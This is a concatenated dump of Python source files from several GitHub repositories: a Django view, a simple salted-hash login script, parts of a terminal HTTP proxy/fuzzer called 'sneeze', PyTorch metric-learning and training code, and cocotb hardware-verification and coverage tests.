return render(request, 'index.html', {'posts': Post.objects.filter(catagory__iexact=ctf), 'ctfs': get_ctfs()})
def get_post(request, ctf, pk):
return render(request, 'post.html', {'p': Post.objects.get(pk=pk), 'ctfs': get_ctfs()})
``` |
{
"source": "JonPizza/py-login-system",
"score": 3
} |
#### File: JonPizza/py-login-system/create_acct.py
```python
from random import randint
import hashlib, time
start_time = time.time()
def sha512(data):
return hashlib.sha512(data.encode('utf-8')).hexdigest()
chars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890!@#%^&*()' # Everything that's not '$'
invalid_creds = False
username = input('Username: ')
user_pass = input('Password: ')
print('\n'*100)
with open('users.txt', 'r') as users:
#Make sure no one has used the username before
file_content = users.read().split('\n')
usernames = []
for i in file_content:
usernames.append(i.split('$')[0])
if username in usernames:
invalid_creds = True
if not invalid_creds:
print('Creating Account...')
salt = ''.join([chars[randint(0, len(chars)-1)] for x in range(8)]) #8 long rand chars
with open('users.txt', 'a') as users:
users.write(username + '$' + sha512(user_pass + salt) + '$' + salt +'\n')
print(f'Done. Time Elapsed: {time.time()-start_time}')
else:
print('Someone has alredy taken that username.')
``` |
{
"source": "JonPizza/sneeze",
"score": 3
} |
#### File: sneeze/attacker/positions.py
```python
import curses
import os
def handle_keystroke(action, screen, http_log):
if action.lower() == 'e':
editor = http_log.config['editor']['editor']
screen.stop()
os.system(f'{editor} {http_log.config_file}')
screen.run(http_log)
def edit_positions(screen, action, http_log):
screen.bottom_msg = '<e> - Edit | <l> - Launch | <p> - Switch Pos/Pay | Fuzzing on %FUZZ%'
stdscr = screen.stdscr
height, width = stdscr.getmaxyx()
handle_keystroke(action, screen, http_log)
y = 4
for line in screen.attacking_req.rstrip().split('\n'):
try:
stdscr.addstr(y, 1, trunc(line, width))
except:
stdscr.addstr(y - 2, 1, '-- TRUNCATED --')
break
y += 1
```
#### File: sneeze/sneeze/logging.py
```python
from proxy.proxy import Request, Response
import configparser
import time
class Logger:
def __init__(self, config_file):
self.config_file = config_file
self.config = configparser.ConfigParser()
self.config.read(self.config_file)
self.save_file = self.config['save']['save_file']
self.token1 = <KEY>&#MAb~y<ry 3$WSMc0=g$QXHw`6H<OwF0cY)_v<k+gb-rKT&\n'
self.token2 = <KEY>&#MAb~y<ry.3$mmmmmmmmAjs#@I(eifd++Y)redditfunny&\n'
def append_req_res(self, req, res):
with open(self.save_file, 'a') as f:
f.write(req + self.token2 + res + self.token1)
def clear(self):
with open(self.save_file, 'w') as f:
f.write('')
def shorten(self, max_pairs=50):
log = self.read()
if len(log) >= max_pairs:
self.clear()
for i in range(0, max_pairs)[::-1]:
self.append_req_res(log[i]['req'], log[i]['res'])
def reload_config(self):
self.config.read(self.config_file)
def read(self):
req_and_res = []
with open(self.save_file) as f:
for r in f.read().split(self.token1):
if r == '':
continue
r = r.split(self.token2)
req_and_res.append({
'req': Request(r[0]),
'res': Response(r[1]),
})
return req_and_res
```
#### File: sneeze/sneeze/screen.py
```python
import curses
from curses import wrapper
import time
from .history import history
from .edit_settings import edit_settings
from .edit_http import edit_req, edit_res
class Screen:
def __init__(self):
self.tabs = ['Proxy', 'Editor', 'Attacker']
self.selected_tab = 0
self.sub_tabs = {
'Proxy': ['History', 'Settings'],
'Editor': ['Request', 'Response'],
'Attacker': ['Payloads', 'Positions'],
}
self.selected_sub_tab = 0
self.selected_row = 1
self.window = 0
self.running = True
self.main_funcs = {
'History': history,
'Settings': edit_settings,
'Request': edit_req,
'Response': edit_res,
}
self.selected_req = 0
self.editing_req_num = 0
self.editing_req = ''
self.editing_res = ''
self.attacking_req = ''
self.bottom_msg = 'Welcome to Sneeze!'
def setup(self):
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_YELLOW)
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_CYAN)
self.colors = {
'highlight': curses.color_pair(1),
'invert': curses.color_pair(2),
'normal': curses.color_pair(3),
'selected': curses.color_pair(4),
}
curses.curs_set(0)
def draw(self, stdscr):
self.stdscr = stdscr
height, width = stdscr.getmaxyx()
self.clear(height, width)
self.setup()
while True:
if not self.running:
break
height, width = stdscr.getmaxyx()
self.clear_window1(height, width)
main = self.main_funcs[self.sub_tabs[self.tabs[self.selected_tab % len(self.sub_tabs)]][self.selected_sub_tab % 2]]
main(self, '', self.log)
self.draw_banner(width)
if self.window == 0:
self.bottom_msg = '<space> - Switch windows | <arrow keys> - Switch tabs'
self.draw_bottom_msg(height, width)
self.draw_tabs(self.tabs, self.selected_tab, 1, width)
self.draw_tabs(self.sub_tabs[self.tabs[self.selected_tab % len(self.sub_tabs)]], self.selected_sub_tab, 2, width)
self.draw_seperator(width, 3)
action = stdscr.getkey()
self.handle_tab_movement(action)
if self.window == 1:
main(self, action, self.log)
stdscr.refresh()
def clear_window1(self, height, width):
for i in range(4, height - 1):
self.stdscr.addstr(i, 0, ' ' * width)
self.stdscr.addstr(height - 1, 0, ' ' * (width - 1))
def clear(self, height, width):
for i in range(height - 1):
self.stdscr.addstr(i, 0, ' ' * width)
def draw_banner(self, width):
self.stdscr.addstr(0, 0, ' Sneeze v1.0.0' + ' ' * (width - 26) + 'By JonPizza ', self.colors['highlight'])
def draw_bottom_msg(self, height, width):
self.stdscr.addstr(height - 1, 0, ' ' + self.bottom_msg + ' ' * (width - len(self.bottom_msg) - 2), self.colors['invert'])
def handle_tab_movement(self, action):
if action == ' ':
if self.window == 1:
self.window = 0
else:
self.window = 1
if self.window == 1:
return
if action == 'KEY_RIGHT':
if self.selected_row == 1:
self.selected_tab += 1
else:
self.selected_sub_tab += 1
elif action == 'KEY_LEFT':
if self.selected_row == 1:
self.selected_tab -= 1
else:
self.selected_sub_tab -= 1
elif action == 'KEY_DOWN':
if self.selected_row == 1:
self.selected_row = 2
elif action == 'KEY_UP':
if self.selected_row == 2:
self.selected_row = 1
def draw_tabs(self, tabs, selected, y, width):
self.stdscr.addstr(y, 0, ' ' * width)
x = 2
if 1 == self.window:
self.stdscr.addstr(1, 0, '▼')
self.stdscr.addstr(2, 0, '▼')
elif 1 == self.selected_row:
self.stdscr.addstr(1, 0, '➞')
self.stdscr.addstr(2, 0, ' ')
else:
self.stdscr.addstr(2, 0, '➞')
self.stdscr.addstr(1, 0, ' ')
for tab in tabs:
if tab != tabs[abs(selected) % len(tabs)]:
self.stdscr.addstr(y, x, f' {tab} ', self.colors['invert'])
else:
self.stdscr.addstr(y, x, f' {tab} ', self.colors['selected'])
x += len(tab) + 4
def draw_seperator(self, width, y):
self.stdscr.addstr(y, 0, '«' * width)
def stop(self):
self.running = False
curses.endwin()
def run(self, log):
self.log = log
self.running = True
wrapper(self.draw)
if __name__ == '__main__':
screen = Screen()
screen.run()
``` |
{
"source": "jonpodtu/jonpo_02476",
"score": 3
} |
#### File: src/models/train_model.py
```python
import os
import hydra
import matplotlib.pyplot as plt
import torch
from hydra.utils import to_absolute_path
from model import MyAwesomeModel
from omegaconf import DictConfig
from torch import optim
from torch.utils.data import DataLoader, TensorDataset
@hydra.main(config_path="config", config_name="training_conf.yaml")
def main(cfg: DictConfig):
print("Training day and night...")
trainset = TensorDataset(
torch.load(to_absolute_path(cfg.paths["images"])),
torch.load(to_absolute_path(cfg.paths["labels"])),
)
train_set = DataLoader(
trainset, batch_size=cfg.hyperparameters["batch_size"], shuffle=True
)
print("The trainingset is {} long!".format(len(trainset)))
# Criterion: We use the negative log likelihood as our output is logSoftMax
criterion = torch.nn.NLLLoss()
if cfg.hyperparameters["optimizer"].lower() == "adam":
optimizer = optim.Adam(model.parameters(), lr=cfg.hyperparameters["lr"])
elif cfg.hyperparameters["optimizer"].lower() == "sgd":
optimizer = optim.SGD(model.parameters(), lr=cfg.hyperparameters["lr"])
else:
print('Not a valid optimizer! Please choose "adam" or "sgd".')
# Epochs and train_loss
epochs = cfg.hyperparameters["epochs"]
train_loss = []
for e in range(epochs):
# Dropout should be one ie. we set model to training mode
model.train()
running_loss = 0
"""
The for-loop does the following:
We use convolutional network, so first we unsqueeze
Resets the gradients
1. Makes a forward pass through the network
2. Use the logits to calculate the loss. We use the computed
logits from our output.
3. Perform a backward pass through the network with
loss.backward() to calculate the gradients
4. Take a step with the optimizer to update the weights
"""
for images, labels in train_set:
images = images.unsqueeze(1)
optimizer.zero_grad()
output = model(images)
loss = criterion(output, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
train_loss.append(loss.item())
print("[%d] loss: %.3f" % (e + 1, running_loss / len(train_set)))
models_dir = to_absolute_path(cfg.paths["model_save"])
os.makedirs(models_dir, exist_ok=True)
torch.save(model, to_absolute_path(os.path.join(models_dir, "trained_model.pt")))
fig_dir = to_absolute_path(cfg.paths["figures"])
os.makedirs(fig_dir, exist_ok=True)
plt.plot(train_loss, label="Training loss")
plt.legend()
plt.xlabel("Epoch")
plt.ylabel("Loss")
plt.savefig(os.path.join(fig_dir, "loss.png"))
if __name__ == "__main__":
model = MyAwesomeModel()
hydra.core.global_hydra.GlobalHydra.instance().clear()
main()
```
#### File: jonpo_02476/tests/test_model.py
```python
import os
import unittest
import pytest
import torch
from torch.utils.data import DataLoader, TensorDataset
from src.models.model import MyAwesomeModel
from tests import _PATH_DATA
@pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found")
class TestClass(unittest.TestCase):
# Load data
tr_images = torch.load(os.path.join(_PATH_DATA, "images_train.pt"))
tr_labels = torch.load(os.path.join(_PATH_DATA, "labels_train.pt"))
train_set = DataLoader(
TensorDataset(tr_images, tr_labels), batch_size=64, shuffle=True
)
model = MyAwesomeModel()
orig_parameters = list(model.parameters())
optimizer = torch.optim.Adam(model.parameters())
criterion = torch.nn.NLLLoss()
def test_optimization(self):
# We simply take one training step
for images, labels in self.train_set:
images = images.unsqueeze(1)
self.optimizer.zero_grad()
output = self.model(images)
loss = self.criterion(output, labels)
loss.backward()
self.optimizer.step()
self.assertListEqual(
self.orig_parameters, list(self.model.parameters())
), "The model parameters are not being optimized"
break
def test_error_on_wrong_shape(self):
with pytest.raises(ValueError, match="Expected input to a 4D tensor"):
self.model(torch.randn(1, 28, 28))
``` |
{
"source": "jonpoveda/proxy-nca",
"score": 2
} |
#### File: jonpoveda/proxy-nca/proxynca.py
```python
from similarity import pairwise_distance
import torch
import torch.nn.functional as F
def binarize_and_smooth_labels(T, nb_classes, smoothing_const = 0.1):
import sklearn.preprocessing
T = T.cpu().numpy()
T = sklearn.preprocessing.label_binarize(
T, classes = range(0, nb_classes)
)
T = T * (1 - smoothing_const)
T[T == 0] = smoothing_const / (nb_classes - 1)
T = torch.FloatTensor(T).cuda()
return T
class ProxyNCAUnstable(torch.nn.Module):
def __init__(self, nb_classes, sz_embed, smoothing_const = 0.0,
exclude_positive = False):
torch.nn.Module.__init__(self)
self.proxies = torch.nn.Parameter(torch.randn(nb_classes, sz_embed) / 8)
self.exclude_positive = exclude_positive
self.smoothing_const = smoothing_const
def forward_single(self, X, T, i):
P = self.proxies
nb_classes = len(P)
sz_batch = len(X)
P = 3 * F.normalize(P, p = 2, dim = -1)
X = 3 * F.normalize(X, p = 2, dim = -1)
y_label = T[i].long().cuda()
Z_labels = torch.arange(nb_classes).long().cuda()
if self.exclude_positive:
# all classes/proxies except of t
Z_labels = Z_labels[Z_labels != y_label].long()
assert Z_labels.size(0) == nb_classes - 1
# necessary to calc distances for label smoothing
# if label smoothing ommitted, one can simply use p_dist = D[i][y_label]
D = pairwise_distance(
torch.cat(
[X, P]
),
squared = True
)[:X.size()[0], X.size()[0]:]
# use all positives, for probabilities, else p_dist = D[i][y_label]
p_dist = D[i]
n_dist = D[i][Z_labels]
return torch.log(torch.exp(p_dist) / torch.sum(torch.exp(n_dist)))
def forward(self, X, T):
# log with exp results in unstable calculations, could use max to fix it
out = torch.stack(
[self.forward_single(X, T, i) for i in range(len(X))]
)
T = binarize_and_smooth_labels(
T = T,
nb_classes = len(self.proxies),
smoothing_const = self.smoothing_const
)
# if D not calculated (pdist), then smoothing only for positive possible
loss = (- T * out).sum(-1).mean()
return loss
class ProxyNCA(torch.nn.Module):
def __init__(self, nb_classes, sz_embed, smoothing_const = 0.0, **kwargs):
torch.nn.Module.__init__(self)
self.proxies = torch.nn.Parameter(torch.randn(nb_classes, sz_embed) / 8)
self.smoothing_const = smoothing_const
def forward(self, X, T):
P = self.proxies
P = 3 * F.normalize(P, p = 2, dim = -1)
X = 3 * F.normalize(X, p = 2, dim = -1)
D = pairwise_distance(
torch.cat(
[X, P]
),
squared = True
)[:X.size()[0], X.size()[0]:]
T = binarize_and_smooth_labels(
T = T, nb_classes = len(P), smoothing_const = self.smoothing_const
)
# cross entropy with distances as logits, one hot labels
# note that compared to proxy nca, positive not excluded in denominator
loss = torch.sum(- T * F.log_softmax(D, -1), -1)
return loss.mean()
if __name__ == '__main__':
import random
nb_classes = 100
sz_batch = 32
sz_embed = 64
X = torch.randn(sz_batch, sz_embed).cuda()
P = torch.randn(nb_classes, sz_embed).cuda()
T = torch.arange(
0, nb_classes
).repeat(sz_batch)[torch.randperm(nb_classes * sz_batch)[:sz_batch]].cuda()
pnca = ProxyNCA(nb_classes, sz_embed).cuda()
pnca_unst = ProxyNCAUnstable(
nb_classes, sz_embed, exclude_positive= False
).cuda()
pnca_unst.proxies.data = pnca.proxies.data.clone()
print(pnca(X, T.view(sz_batch)))
print(pnca_unst(X, T.view(sz_batch, 1)))
``` |
{
"source": "jonpovey/cocotb-coverage",
"score": 2
} |
#### File: pkt_switch/tests/test_pkt_switch.py
```python
import cocotb
from cocotb.triggers import Timer, RisingEdge, ReadOnly
from cocotb.drivers import BusDriver
from cocotb.monitors import BusMonitor
from cocotb_coverage.coverage import *
from cocotb_coverage.crv import *
import numpy as np
class Packet(Randomized):
def __init__(self, data = [0, 3, 0]):
Randomized.__init__(self)
self.addr = data[0]
self.len = len(data)
self.payload = data[2:]
self.add_rand("addr", list(range(256)))
self.add_rand("len", list(range(3,32)))
def post_randomize(self):
self.payload = [np.random.randint(256) for _ in range(self.len-2)]
class PacketIFDriver(BusDriver):
'''
Packet Interface Driver
'''
_signals = ["data", "valid"]
def __init__(self, entity, name, clock):
BusDriver.__init__(self, entity, name, clock)
self.clock = clock
self.bus.data.setimmediatevalue(0)
self.bus.valid.setimmediatevalue(0)
@cocotb.coroutine
def send(self, packet):
self.bus.valid <= 1
# transmit header
self.bus.data <= packet.addr
yield RisingEdge(self.clock)
self.bus.data <= packet.len
yield RisingEdge(self.clock)
for byte in packet.payload:
self.bus.data <= byte
yield RisingEdge(self.clock)
self.bus.valid <= 0
yield RisingEdge(self.clock)
class PacketIFMonitor(BusMonitor):
'''
Packet Interface Monitor
'''
_signals = ["data", "valid"]
def __init__(self, entity, name, clock):
BusMonitor.__init__(self, entity, name, clock)
self.clock = clock
@cocotb.coroutine
def _monitor_recv(self):
pkt_receiving = False
received_data = []
while True:
yield RisingEdge(self.clock)
yield ReadOnly()
if (self.bus.valid == 1):
pkt_receiving = True
received_data.append(int(self.bus.data))
elif pkt_receiving and (self.bus.valid == 0): # packet ended
pkt = Packet(received_data)
self._recv(pkt)
pkt_receiving = False
received_data = []
# simple clock generator
@cocotb.coroutine
def clock_gen(signal, period=10000):
while True:
signal <= 0
yield Timer(period/2)
signal <= 1
yield Timer(period/2)
@cocotb.test()
def pkt_switch_test(dut):
""" PKT_SWITCH Test """
log = cocotb.logging.getLogger("cocotb.test") # logger instance
cocotb.fork(clock_gen(dut.clk, period=100)) # start clock running
# reset & init
dut.rst_n <= 1
dut.datain_data <= 0
dut.datain_valid <= 0
dut.ctrl_addr <= 0
dut.ctrl_data <= 0
dut.ctrl_wr <= 0
yield Timer(1000)
dut.rst_n <= 0
yield Timer(1000)
dut.rst_n <= 1
# procedure of writing configuration registers
@cocotb.coroutine
def write_config(addr, data):
for [a, d] in zip(addr, data):
dut.ctrl_addr <= a
dut.ctrl_data <= d
dut.ctrl_wr <= 1
yield RisingEdge(dut.clk)
dut.ctrl_wr <= 0
enable_transmit_both = lambda: write_config([0], [4])
disable_filtering = lambda: write_config([0], [0])
@cocotb.coroutine
def enable_addr_filtering(addr, mask):
yield write_config([0, 2, 3], [1, addr, mask])
@cocotb.coroutine
def enable_len_filtering(low_limit, up_limit):
yield write_config([0, 4, 5], [2, low_limit, up_limit])
driver = PacketIFDriver(dut, name="datain", clock=dut.clk)
monitor0 = PacketIFMonitor(dut, name="dataout0", clock=dut.clk)
monitor1 = PacketIFMonitor(dut, name="dataout1", clock=dut.clk)
expected_data0 = [] # queue of expeced packet at interface 0
expected_data1 = [] # queue of expeced packet at interface 1
def scoreboarding(pkt, queue_expected):
assert pkt.addr == queue_expected[0].addr
assert pkt.len == queue_expected[0].len
assert pkt.payload == queue_expected[0].payload
queue_expected.pop()
monitor0.add_callback(lambda _ : scoreboarding(_, expected_data0))
monitor1.add_callback(lambda _ : scoreboarding(_, expected_data1))
monitor0.add_callback(lambda _ : log.info("Receiving packet on interface 0 (packet not filtered)"))
monitor1.add_callback(lambda _ : log.info("Receiving packet on interface 1 (packet filtered)"))
# functional coverage - check received packet
@CoverPoint(
"top.packet_length",
xf = lambda pkt, event, addr, mask, ll, ul: pkt.len, # packet length
bins = list(range(3,32)) # may be 3 ... 31 bytes
)
@CoverPoint("top.event", vname="event", bins = ["DIS", "TB", "AF", "LF"])
@CoverPoint(
"top.filt_addr",
xf = lambda pkt, event, addr, mask, ll, ul: # filtering based on particular bits in header
(addr & mask & 0x0F) if event == "AF" else None, # check only if event is "address filtering"
bins = list(range(16)), # check only 4 LSBs if all options tested
)
@CoverPoint(
"top.filt_len_eq",
xf = lambda pkt, event, addr, mask, ll, ul: ll == ul, # filtering of a single packet length
bins = [True, False]
)
@CoverPoint(
"top.filt_len_ll",
vname = "ll", # lower limit of packet length
bins = list(range(3,32)) # 3 ... 31
)
@CoverPoint(
"top.filt_len_ul",
vname = "ul", # upper limit of packet length
bins = list(range(3,32)) # 3 ... 31
)
@CoverCross(
"top.filt_len_ll_x_packet_length",
items = ["top.packet_length", "top.filt_len_ll"]
)
@CoverCross(
"top.filt_len_ul_x_packet_length",
items = ["top.packet_length", "top.filt_len_ul"]
)
def log_sequence(pkt, event, addr, mask, ll, ul):
log.info("Processing packet:")
log.info(" ADDRESS: %X", pkt.addr)
log.info(" LENGTH: %d", pkt.len)
log.info(" PAYLOAD: " + str(pkt.payload))
if event is "DIS":
log.info("Filtering disabled")
elif event is "TB":
log.info("Transmit on both interfaces")
elif event is "AF":
log.info("Address filtering, address: %02X, mask: %02X", addr, mask)
elif event is "LF":
log.info("Length filtering, lower limit: %d, upper limit: %d", ll, ul)
# main loop
for _ in range(1000): # is that enough repetitions to ensure coverage goal? Check out!
event = np.random.choice(["DIS", "TB", "AF", "LF"])
# DIS - disable filtering : expect all packets on interface 0
# TB - transmit bot : expect all packets on interface 0 and 1
# AF - address filtering : expect filtered packets on interface 1, others on 0
# LF - length filtering : expect filtered packets on interface 1, others on 0
# randomize test data
pkt = Packet();
pkt.randomize()
addr = np.random.randint(256) # 0x00 .. 0xFF
mask = np.random.randint(256) # 0x00 .. 0xFF
low_limit = np.random.randint(3,32) # 3 ... 31
up_limit = np.random.randint(low_limit,32) # low_limit ... 31
# expect the packet on the particular interface
if event == "DIS":
yield disable_filtering()
expected_data0.append(pkt)
elif event == "TB":
yield enable_transmit_both()
expected_data0.append(pkt)
expected_data1.append(pkt)
elif event == "AF":
yield enable_addr_filtering(addr, mask)
if ((pkt.addr & mask) == (addr & mask)):
expected_data1.append(pkt)
else:
expected_data0.append(pkt)
elif event == "LF":
yield enable_len_filtering(low_limit, up_limit)
if (low_limit <= pkt.len <= up_limit):
expected_data1.append(pkt)
else:
expected_data0.append(pkt)
# wait DUT
yield driver.send(pkt)
yield RisingEdge(dut.clk)
yield RisingEdge(dut.clk)
# LOG the action
log_sequence(pkt, event, addr, mask, low_limit, up_limit)
# print coverage report
coverage_db.report_coverage(log.info, bins=False)
# export
coverage_db.export_to_xml(filename="coverage_pkt_switch.xml")
coverage_db.export_to_yaml(filename="coverage_pkt_switch.yml")
```
#### File: tests/test_coverage/coverage_test.py
```python
from cocotb_coverage import coverage
import pytest
import random
#simple coverpoint
def test_simple_coverpoint():
print("Running test_simple_coverpoint")
for i in range(10):
x = random.randint(0,10)
@coverage.CoverPoint("top.t1.c1", vname="i", bins = list(range(10)))
@coverage.CoverPoint("top.t1.c2", vname="x", bins = list(range(10)))
def sample(i, x):
pass
sample(i, x)
#check coverage size
assert coverage.coverage_db["top.t1.c1"].size == 10
#expect all covered
assert coverage.coverage_db["top.t1.c1"].coverage == 10
#expect 100%
assert coverage.coverage_db["top.t1.c1"].cover_percentage == 100
#expect something covered
assert 0 < coverage.coverage_db["top.t1.c2"].coverage < 10
#expect each bin hit only once
for i in range(10):
assert coverage.coverage_db["top.t1.c1"].detailed_coverage[i] == 1
#coverage.coverage_db.report_coverage(print, bins=False)
class FooBar():
def __init__(self):
pass
@coverage.CoverPoint("top.t2.in_class", bins = ["foo", "bar"])
def cover(self, something):
pass
#coverpoint in class
def test_coverpoint_in_class():
print("Running test_coverpoint_in_class")
fb = FooBar()
assert coverage.coverage_db["top.t2.in_class"].size == 2
assert coverage.coverage_db["top.t2.in_class"].coverage == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 0
fb.cover("bar")
assert coverage.coverage_db["top.t2.in_class"].coverage == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 1
fb.cover("bar")
assert coverage.coverage_db["top.t2.in_class"].coverage == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 2
fb.cover("foo")
assert coverage.coverage_db["top.t2.in_class"].coverage == 2
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 2
#injective coverpoint - matching multiple bins at once
def test_injective_coverpoint():
print("Running test_injective_coverpoint")
def is_divider(number, divider):
return number % divider == 0
@coverage.CoverPoint("top.t3.inj", rel = is_divider, bins = [1, 2, 3, 5, 7, 11, 13, 17], inj = False)
def sample(x):
pass
assert coverage.coverage_db["top.t3.inj"].size == 8
assert coverage.coverage_db["top.t3.inj"].coverage == 0
sample(17) #covers 1 and 17
assert coverage.coverage_db["top.t3.inj"].coverage == 2
sample(30) #covers 2,3 and 5
assert coverage.coverage_db["top.t3.inj"].coverage == 5
sample(77) #covers 7 and 11
assert coverage.coverage_db["top.t3.inj"].coverage == 7
#cross
def test_covercross():
print("Running test_covercross")
for i in range(10):
@coverage.CoverPoint("top.t4.c1", vname="x1", bins = list(range(10)))
@coverage.CoverPoint("top.t4.c2", xf = lambda x1, x2, x3 : x2 ** (0.5), bins = list(range(10)))
@coverage.CoverPoint("top.t4.c3", xf = lambda x1, x2, x3 : x1 + x2 + x3, bins = list(range(10)))
@coverage.CoverCross("top.t4.cross1", items = ["top.t4.c1","top.t4.c2","top.t4.c3"])
@coverage.CoverCross("top.t4.cross2", items = ["top.t4.c1","top.t4.c2"],
ign_bins = [(None, 1), (2,2), (4, 5)] #ignored any c1 if c2=1, pair of (2,2) and (4,5)
)
@coverage.CoverCross("top.t4.cross3", items = ["top.t4.c1","top.t4.c2"],
ign_bins = [(ii, ii) for ii in range(10)] #ignore all pairs of the same numbers
)
def sample(x1, x2, x3):
pass
sample(i, i**2, -i)
#We expect c1 and c2 covered in all range, c3 covered bins: 0, 1, 4, 9
assert coverage.coverage_db["top.t4.c1"].coverage == 10
assert coverage.coverage_db["top.t4.c2"].coverage == 10
assert coverage.coverage_db["top.t4.c3"].coverage == 4
#cross1 size is 1000 (10x10x10), but covered only 4 bins (note out of range)
assert coverage.coverage_db["top.t4.cross1"].size == 1000
assert coverage.coverage_db["top.t4.cross1"].coverage == 4
#cross2 size is 100 (10x10) minus 12 = 88
assert coverage.coverage_db["top.t4.cross2"].size == 88
assert coverage.coverage_db["top.t4.cross2"].coverage == 8
#cross3 size is 100 (10x10) minus 10 = 90
assert coverage.coverage_db["top.t4.cross3"].size == 90
assert coverage.coverage_db["top.t4.cross3"].coverage == 0 #expect nothing covered
#test at least and weight
def test_at_least_and_weight():
print("Running test_at_least_and_weight")
@coverage.CoverPoint("top.t5.c1", vname="i", bins = list(range(10)), weight = 100)
@coverage.CoverPoint("top.t5.c2", xf = lambda i, x : i % 6, bins = list(range(5)), at_least = 2)
@coverage.CoverPoint("top.t5.c3", vname="x", bins = list(range(10)), at_least = 2)
@coverage.CoverCross("top.t5.cross", items = ["top.t5.c1","top.t5.c2"], at_least = 2)
def sample(i, x):
pass
for i in range(10):
x = random.randint(0,5)
sample(i, x)
#expect all covered, but weight is * 100
assert coverage.coverage_db["top.t5.c1"].size == 1000
assert coverage.coverage_db["top.t5.c1"].coverage == 1000
#in c2 expect covered only at least 2 times, so 4 in total
assert coverage.coverage_db["top.t5.c2"].coverage == 4
#expect something covered in c3
assert 0 < coverage.coverage_db["top.t5.c3"].coverage < 10
assert coverage.coverage_db["top.t5.cross"].size == 50
assert coverage.coverage_db["top.t5.cross"].coverage == 0
sample(0, 0) #sample one more time to make sure cross satisfies "at_least" condition
assert coverage.coverage_db["top.t5.cross"].coverage == 1
#test callbacks
def test_callbacks():
print("Running test_callbacks")
current_step = 0
cb1_fired = [False]
cb2_fired = [False]
cb3_fired = [False]
def bins_callback_1():
cb1_fired[0] = True
print("Bins callback 1 fired at step %d" % current_step)
assert current_step == 3 or current_step == 53
def threshold_callback_2():
cb2_fired[0] = True
print("top.threshold callback 2 fired at step %d" % current_step)
assert current_step == 49
def threshold_callback_3():
cb3_fired[0] = True
print("top.threshold callback 3 fired at step %d" % current_step)
assert current_step == 29
@coverage.CoverPoint("top.t6.c1", bins = list(range(100)))
@coverage.CoverPoint("top.t6.c2", xf = lambda i : i % 50, bins = list(range(50)))
def sample(i):
pass
coverage.coverage_db["top.t6.c1"].add_threshold_callback(threshold_callback_2,50)
coverage.coverage_db["top.t6"].add_threshold_callback(threshold_callback_3,40)
coverage.coverage_db["top.t6.c2"].add_bins_callback(bins_callback_1,3)
for i in range(100):
sample(i)
current_step += 1
assert cb1_fired[0]
assert cb2_fired[0]
assert cb3_fired[0]
#test xml export
def test_xml_export():
import os.path
from xml.etree import ElementTree as et
import yaml
print("Running test_xml_export")
#test CoverCheck
@coverage.CoverCheck(name = "top.t7.failed_check",
f_fail = lambda i : i == 0,
f_pass = lambda i : i > 5)
@coverage.CoverCheck(name = "top.t7.passing_check",
f_fail = lambda i : i > 100,
f_pass = lambda i : i < 50)
def sample(i):
pass
for i in range(50):
sample(i)
#coverage.coverage_db.report_coverage(print, bins=False)
# Export coverage to XML, check if file exists
xml_filename = 'test_xml_export_output.xml'
yml_filename = 'test_yaml_export_output.yml'
coverage.coverage_db.export_to_xml(filename='test_xml_export_output.xml')
coverage.coverage_db.export_to_yaml(filename='test_yaml_export_output.yml')
assert os.path.isfile(xml_filename)
assert os.path.isfile(yml_filename)
# Read back the XML
xml_db = et.parse(xml_filename).getroot()
# dict - child: [all parents for that name]
child_parent_dict = {}
for p in xml_db.iter():
for c in p:
if 'bin' not in c.tag:
if c.tag not in child_parent_dict.keys():
child_parent_dict[c.tag] = [p.tag]
else:
child_parent_dict[c.tag].append(p.tag)
# Check if coverage_db items are XML, with proper parents
for item in coverage.coverage_db:
if '.' in item:
item_elements = item.split('.')
assert 'top' in child_parent_dict[item_elements[1]]
for elem_parent, elem in zip(item_elements, item_elements[1:]):
assert elem_parent in child_parent_dict[elem]
# Check YML
with open(yml_filename, 'r') as fp:
yml_db = yaml.safe_load(fp)
for item in yml_db:
if isinstance(coverage.coverage_db[item], coverage.CoverPoint):
#assert if correct coverage levels
assert yml_db[item]['coverage'] == coverage.coverage_db[item].coverage
# check if yaml and coverage databases have equal size
assert len(yml_db) == len(coverage.coverage_db)
# test xml/yaml merge - static example covering
# adding new elements and updating existing
def test_xml_merge():
import os.path
from xml.etree import ElementTree as et
print("Running test_xml_merge")
filename = 'test_xml_merge_output.xml'
coverage.merge_coverage(print, filename, 'cov_short1_input.xml', 'cov_short2_input.xml', 'cov_short3_input.xml')
assert os.path.isfile(filename)
# Read back the XML
xml_db = et.parse(filename).getroot()
assert xml_db.tag == 'top'
assert xml_db.attrib['coverage'] == '102'
assert xml_db.attrib['size'] == '104'
def test_yaml_merge():
import os.path
import yaml
print("Running test_yaml_merge")
filename = 'test_yaml_merge_output.yml'
coverage.merge_coverage(print, filename, 'coverage1_input.yml', 'coverage2_input.yml',
'coverage3_input.yml')
assert os.path.isfile(filename)
#Read back the XML
with open(filename, 'r') as stream:
try:
yaml_parsed = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
assert yaml_parsed['top']['coverage'] == 52
assert yaml_parsed['top']['size'] == 122
assert 'top.coveritemm.signall.cp10' in list(yaml_parsed.keys())
#test covercheck
def test_covercheck():
print("Running test_covercheck")
@coverage.CoverCheck("top.t8.check", f_pass = lambda x : x > 0, f_fail = lambda x : x < 0, at_least = 2)
def sample(x):
pass
assert coverage.coverage_db["top.t8.check"].size == 1
assert coverage.coverage_db["top.t8.check"].coverage == 0
sample(0)
sample(1)
assert coverage.coverage_db["top.t8.check"].coverage == 0 #should not be covered yet
sample(5)
assert coverage.coverage_db["top.t8.check"].coverage == 1 #should be covered now
sample(-1)
